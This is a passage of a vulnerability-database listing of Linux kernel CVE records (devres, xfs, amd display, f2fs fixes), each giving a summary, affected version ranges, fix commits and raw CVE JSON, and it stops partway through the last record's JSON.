In the Linux kernel, the following vulnerability has been resolved: devres: Fix memory leakage caused by driver API devm_free_percpu() It will cause memory leakage when use driver API devm_free_percpu() to free memory allocated by devm_alloc_percpu(), fixed by using devres_release() instead of devres_destroy() within devm_free_percpu().

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/700e8abd65b10792b…
	https://git.kernel.org/stable/c/b044588a16a978cd8…
	https://git.kernel.org/stable/c/ef56dcdca8f2a53ab…
	https://git.kernel.org/stable/c/3047f99caec240a88…
	https://git.kernel.org/stable/c/3dcd0673e47664bc6…
	https://git.kernel.org/stable/c/b67552d7c61f52f12…
	https://git.kernel.org/stable/c/95065edb8ebb27771…
	https://git.kernel.org/stable/c/bd50a974097bb82d5…

Impacted products

Vendor

Product

Version

Linux

Affected: ff86aae3b4112b85d2231c23bccbc49589df1c06 , < 700e8abd65b10792b2f179ce4e858f2ca2880f85 (git)
Affected: ff86aae3b4112b85d2231c23bccbc49589df1c06 , < b044588a16a978cd891cb3d665dd7ae06850d5bf (git)
Affected: ff86aae3b4112b85d2231c23bccbc49589df1c06 , < ef56dcdca8f2a53abc3a83d388b8336447533d85 (git)
Affected: ff86aae3b4112b85d2231c23bccbc49589df1c06 , < 3047f99caec240a88ccd06197af2868da1af6a96 (git)
Affected: ff86aae3b4112b85d2231c23bccbc49589df1c06 , < 3dcd0673e47664bc6c719ad47dadac6d55d5950d (git)
Affected: ff86aae3b4112b85d2231c23bccbc49589df1c06 , < b67552d7c61f52f1271031adfa7834545ae99701 (git)
Affected: ff86aae3b4112b85d2231c23bccbc49589df1c06 , < 95065edb8ebb27771d5f1e898eef6ab43dc6c87c (git)
Affected: ff86aae3b4112b85d2231c23bccbc49589df1c06 , < bd50a974097bb82d52a458bd3ee39fb723129a0c (git)

Linux

Affected: 4.10
Unaffected: 0 , < 4.10 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-43871",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:06:19.881196Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:18.604Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:06:21.787Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/base/devres.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "700e8abd65b10792b2f179ce4e858f2ca2880f85",
              "status": "affected",
              "version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
              "versionType": "git"
            },
            {
              "lessThan": "b044588a16a978cd891cb3d665dd7ae06850d5bf",
              "status": "affected",
              "version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
              "versionType": "git"
            },
            {
              "lessThan": "ef56dcdca8f2a53abc3a83d388b8336447533d85",
              "status": "affected",
              "version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
              "versionType": "git"
            },
            {
              "lessThan": "3047f99caec240a88ccd06197af2868da1af6a96",
              "status": "affected",
              "version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
              "versionType": "git"
            },
            {
              "lessThan": "3dcd0673e47664bc6c719ad47dadac6d55d5950d",
              "status": "affected",
              "version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
              "versionType": "git"
            },
            {
              "lessThan": "b67552d7c61f52f1271031adfa7834545ae99701",
              "status": "affected",
              "version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
              "versionType": "git"
            },
            {
              "lessThan": "95065edb8ebb27771d5f1e898eef6ab43dc6c87c",
              "status": "affected",
              "version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
              "versionType": "git"
            },
            {
              "lessThan": "bd50a974097bb82d52a458bd3ee39fb723129a0c",
              "status": "affected",
              "version": "ff86aae3b4112b85d2231c23bccbc49589df1c06",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/base/devres.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.10"
            },
            {
              "lessThan": "4.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndevres: Fix memory leakage caused by driver API devm_free_percpu()\n\nIt will cause memory leakage when use driver API devm_free_percpu()\nto free memory allocated by devm_alloc_percpu(), fixed by using\ndevres_release() instead of devres_destroy() within devm_free_percpu()."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:28:13.712Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/700e8abd65b10792b2f179ce4e858f2ca2880f85"
        },
        {
          "url": "https://git.kernel.org/stable/c/b044588a16a978cd891cb3d665dd7ae06850d5bf"
        },
        {
          "url": "https://git.kernel.org/stable/c/ef56dcdca8f2a53abc3a83d388b8336447533d85"
        },
        {
          "url": "https://git.kernel.org/stable/c/3047f99caec240a88ccd06197af2868da1af6a96"
        },
        {
          "url": "https://git.kernel.org/stable/c/3dcd0673e47664bc6c719ad47dadac6d55d5950d"
        },
        {
          "url": "https://git.kernel.org/stable/c/b67552d7c61f52f1271031adfa7834545ae99701"
        },
        {
          "url": "https://git.kernel.org/stable/c/95065edb8ebb27771d5f1e898eef6ab43dc6c87c"
        },
        {
          "url": "https://git.kernel.org/stable/c/bd50a974097bb82d52a458bd3ee39fb723129a0c"
        }
      ],
      "title": "devres: Fix memory leakage caused by driver API devm_free_percpu()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-43871",
    "datePublished": "2024-08-21T00:06:22.964Z",
    "dateReserved": "2024-08-17T09:11:59.280Z",
    "dateUpdated": "2025-11-03T22:06:21.787Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39472 (GCVE-0-2024-39472)

Vulnerability from cvelistv5 – Published: 2024-07-05 06:42 – Updated: 2025-11-03 21:56

Title

xfs: fix log recovery buffer allocation for the legacy h_size fixup

Summary

In the Linux kernel, the following vulnerability has been resolved: xfs: fix log recovery buffer allocation for the legacy h_size fixup Commit a70f9fe52daa ("xfs: detect and handle invalid iclog size set by mkfs") added a fixup for incorrect h_size values used for the initial umount record in old xfsprogs versions. Later commit 0c771b99d6c9 ("xfs: clean up calculation of LR header blocks") cleaned up the log reover buffer calculation, but stoped using the fixed up h_size value to size the log recovery buffer, which can lead to an out of bounds access when the incorrect h_size does not come from the old mkfs tool, but a fuzzer. Fix this by open coding xlog_logrec_hblks and taking the fixed h_size into account for this calculation.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f754591b17d0ee91c…
	https://git.kernel.org/stable/c/57835c0e7152e36b0…
	https://git.kernel.org/stable/c/c2389c074973aa94e…
	https://git.kernel.org/stable/c/45cf976008ddef4a9…

Impacted products

Vendor

Product

Version

Linux

Affected: 0c771b99d6c9a0552fea5cc43669b726dad8f659 , < f754591b17d0ee91c2b45fe9509d0cdc420527cb (git)
Affected: 0c771b99d6c9a0552fea5cc43669b726dad8f659 , < 57835c0e7152e36b03875dd6c56dfeed685c1b1f (git)
Affected: 0c771b99d6c9a0552fea5cc43669b726dad8f659 , < c2389c074973aa94e34992e7f66dac0de37595b5 (git)
Affected: 0c771b99d6c9a0552fea5cc43669b726dad8f659 , < 45cf976008ddef4a9c9a30310c9b4fb2a9a6602a (git)

Linux

Affected: 5.10
Unaffected: 0 , < 5.10 (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.105 , ≤ 6.1.* (semver)
Unaffected: 6.6.46 , ≤ 6.6.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:56:05.270Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/45cf976008ddef4a9c9a30310c9b4fb2a9a6602a"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39472",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:07:45.783551Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:41.426Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/xfs/xfs_log_recover.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f754591b17d0ee91c2b45fe9509d0cdc420527cb",
              "status": "affected",
              "version": "0c771b99d6c9a0552fea5cc43669b726dad8f659",
              "versionType": "git"
            },
            {
              "lessThan": "57835c0e7152e36b03875dd6c56dfeed685c1b1f",
              "status": "affected",
              "version": "0c771b99d6c9a0552fea5cc43669b726dad8f659",
              "versionType": "git"
            },
            {
              "lessThan": "c2389c074973aa94e34992e7f66dac0de37595b5",
              "status": "affected",
              "version": "0c771b99d6c9a0552fea5cc43669b726dad8f659",
              "versionType": "git"
            },
            {
              "lessThan": "45cf976008ddef4a9c9a30310c9b4fb2a9a6602a",
              "status": "affected",
              "version": "0c771b99d6c9a0552fea5cc43669b726dad8f659",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/xfs/xfs_log_recover.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.10"
            },
            {
              "lessThan": "5.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.105",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.46",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.105",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.46",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: fix log recovery buffer allocation for the legacy h_size fixup\n\nCommit a70f9fe52daa (\"xfs: detect and handle invalid iclog size set by\nmkfs\") added a fixup for incorrect h_size values used for the initial\numount record in old xfsprogs versions.  Later commit 0c771b99d6c9\n(\"xfs: clean up calculation of LR header blocks\") cleaned up the log\nreover buffer calculation, but stoped using the fixed up h_size value\nto size the log recovery buffer, which can lead to an out of bounds\naccess when the incorrect h_size does not come from the old mkfs\ntool, but a fuzzer.\n\nFix this by open coding xlog_logrec_hblks and taking the fixed h_size\ninto account for this calculation."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:16:32.069Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f754591b17d0ee91c2b45fe9509d0cdc420527cb"
        },
        {
          "url": "https://git.kernel.org/stable/c/57835c0e7152e36b03875dd6c56dfeed685c1b1f"
        },
        {
          "url": "https://git.kernel.org/stable/c/c2389c074973aa94e34992e7f66dac0de37595b5"
        },
        {
          "url": "https://git.kernel.org/stable/c/45cf976008ddef4a9c9a30310c9b4fb2a9a6602a"
        }
      ],
      "title": "xfs: fix log recovery buffer allocation for the legacy h_size fixup",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39472",
    "datePublished": "2024-07-05T06:42:03.495Z",
    "dateReserved": "2024-06-25T14:23:23.745Z",
    "dateUpdated": "2025-11-03T21:56:05.270Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42118 (GCVE-0-2024-42118)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-07-11 17:19

Title

drm/amd/display: Do not return negative stream id for array

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Do not return negative stream id for array [WHY] resource_stream_to_stream_idx returns an array index and it return -1 when not found; however, -1 is not a valid array index number. [HOW] When this happens, call ASSERT(), and return a zero instead. This fixes an OVERRUN and an NEGATIVE_RETURNS issues reported by Coverity.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a76fa9c4f0fc0aa6f…
	https://git.kernel.org/stable/c/3ac31c9a707dd1c7c…

Impacted products

Vendor

Product

Version

Linux

Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < a76fa9c4f0fc0aa6f517da3fa7d7c23e8a32c7d0 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 3ac31c9a707dd1c7c890b95333182f955e9dcb57 (git)

Linux

Affected: 4.15
Unaffected: 0 , < 4.15 (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:32.598Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a76fa9c4f0fc0aa6f517da3fa7d7c23e8a32c7d0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3ac31c9a707dd1c7c890b95333182f955e9dcb57"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42118",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:17:07.089426Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:05.637Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/core/dc_resource.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a76fa9c4f0fc0aa6f517da3fa7d7c23e8a32c7d0",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "3ac31c9a707dd1c7c890b95333182f955e9dcb57",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/core/dc_resource.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15"
            },
            {
              "lessThan": "4.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Do not return negative stream id for array\n\n[WHY]\nresource_stream_to_stream_idx returns an array index and it return -1\nwhen not found; however, -1 is not a valid array index number.\n\n[HOW]\nWhen this happens, call ASSERT(), and return a zero instead.\n\nThis fixes an OVERRUN and an NEGATIVE_RETURNS issues reported by Coverity."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-11T17:19:55.458Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a76fa9c4f0fc0aa6f517da3fa7d7c23e8a32c7d0"
        },
        {
          "url": "https://git.kernel.org/stable/c/3ac31c9a707dd1c7c890b95333182f955e9dcb57"
        }
      ],
      "title": "drm/amd/display: Do not return negative stream id for array",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42118",
    "datePublished": "2024-07-30T07:46:10.486Z",
    "dateReserved": "2024-07-29T15:50:41.178Z",
    "dateUpdated": "2025-07-11T17:19:55.458Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42296 (GCVE-0-2024-42296)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:09 – Updated: 2025-11-03 22:03

Title

f2fs: fix return value of f2fs_convert_inline_inode()

Summary

In the Linux kernel, the following vulnerability has been resolved: f2fs: fix return value of f2fs_convert_inline_inode() If device is readonly, make f2fs_convert_inline_inode() return EROFS instead of zero, otherwise it may trigger panic during writeback of inline inode's dirty page as below: f2fs_write_single_data_page+0xbb6/0x1e90 fs/f2fs/data.c:2888 f2fs_write_cache_pages fs/f2fs/data.c:3187 [inline] __f2fs_write_data_pages fs/f2fs/data.c:3342 [inline] f2fs_write_data_pages+0x1efe/0x3a90 fs/f2fs/data.c:3369 do_writepages+0x359/0x870 mm/page-writeback.c:2634 filemap_fdatawrite_wbc+0x125/0x180 mm/filemap.c:397 __filemap_fdatawrite_range mm/filemap.c:430 [inline] file_write_and_wait_range+0x1aa/0x290 mm/filemap.c:788 f2fs_do_sync_file+0x68a/0x1ae0 fs/f2fs/file.c:276 generic_write_sync include/linux/fs.h:2806 [inline] f2fs_file_write_iter+0x7bd/0x24e0 fs/f2fs/file.c:4977 call_write_iter include/linux/fs.h:2114 [inline] new_sync_write fs/read_write.c:497 [inline] vfs_write+0xa72/0xc90 fs/read_write.c:590 ksys_write+0x1a0/0x2c0 fs/read_write.c:643 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf5/0x240 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/70f5ef5f33c333cfb…
	https://git.kernel.org/stable/c/47a8ddcdcaccd9b89…
	https://git.kernel.org/stable/c/077f0e24b27c4b448…
	https://git.kernel.org/stable/c/1e7725814361c8c00…
	https://git.kernel.org/stable/c/a8eb3de28e7a36569…

Impacted products

Vendor

Product

Version

Linux

Affected: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 , < 70f5ef5f33c333cfb286116fa3af74ac9bc84f1b (git)
Affected: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 , < 47a8ddcdcaccd9b891db4574795e46a33a121ac2 (git)
Affected: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 , < 077f0e24b27c4b44841593c7edbd1993be9eecb5 (git)
Affected: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 , < 1e7725814361c8c008d131db195cef8274ff26b8 (git)
Affected: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 , < a8eb3de28e7a365690c61161e7a07a4fc7c60bbf (git)

Linux

Affected: 3.8
Unaffected: 0 , < 3.8 (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42296",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:10:47.727572Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:28.998Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:03:55.469Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/f2fs/inline.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "70f5ef5f33c333cfb286116fa3af74ac9bc84f1b",
              "status": "affected",
              "version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
              "versionType": "git"
            },
            {
              "lessThan": "47a8ddcdcaccd9b891db4574795e46a33a121ac2",
              "status": "affected",
              "version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
              "versionType": "git"
            },
            {
              "lessThan": "077f0e24b27c4b44841593c7edbd1993be9eecb5",
              "status": "affected",
              "version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
              "versionType": "git"
            },
            {
              "lessThan": "1e7725814361c8c008d131db195cef8274ff26b8",
              "status": "affected",
              "version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
              "versionType": "git"
            },
            {
              "lessThan": "a8eb3de28e7a365690c61161e7a07a4fc7c60bbf",
              "status": "affected",
              "version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/f2fs/inline.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.8"
            },
            {
              "lessThan": "3.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
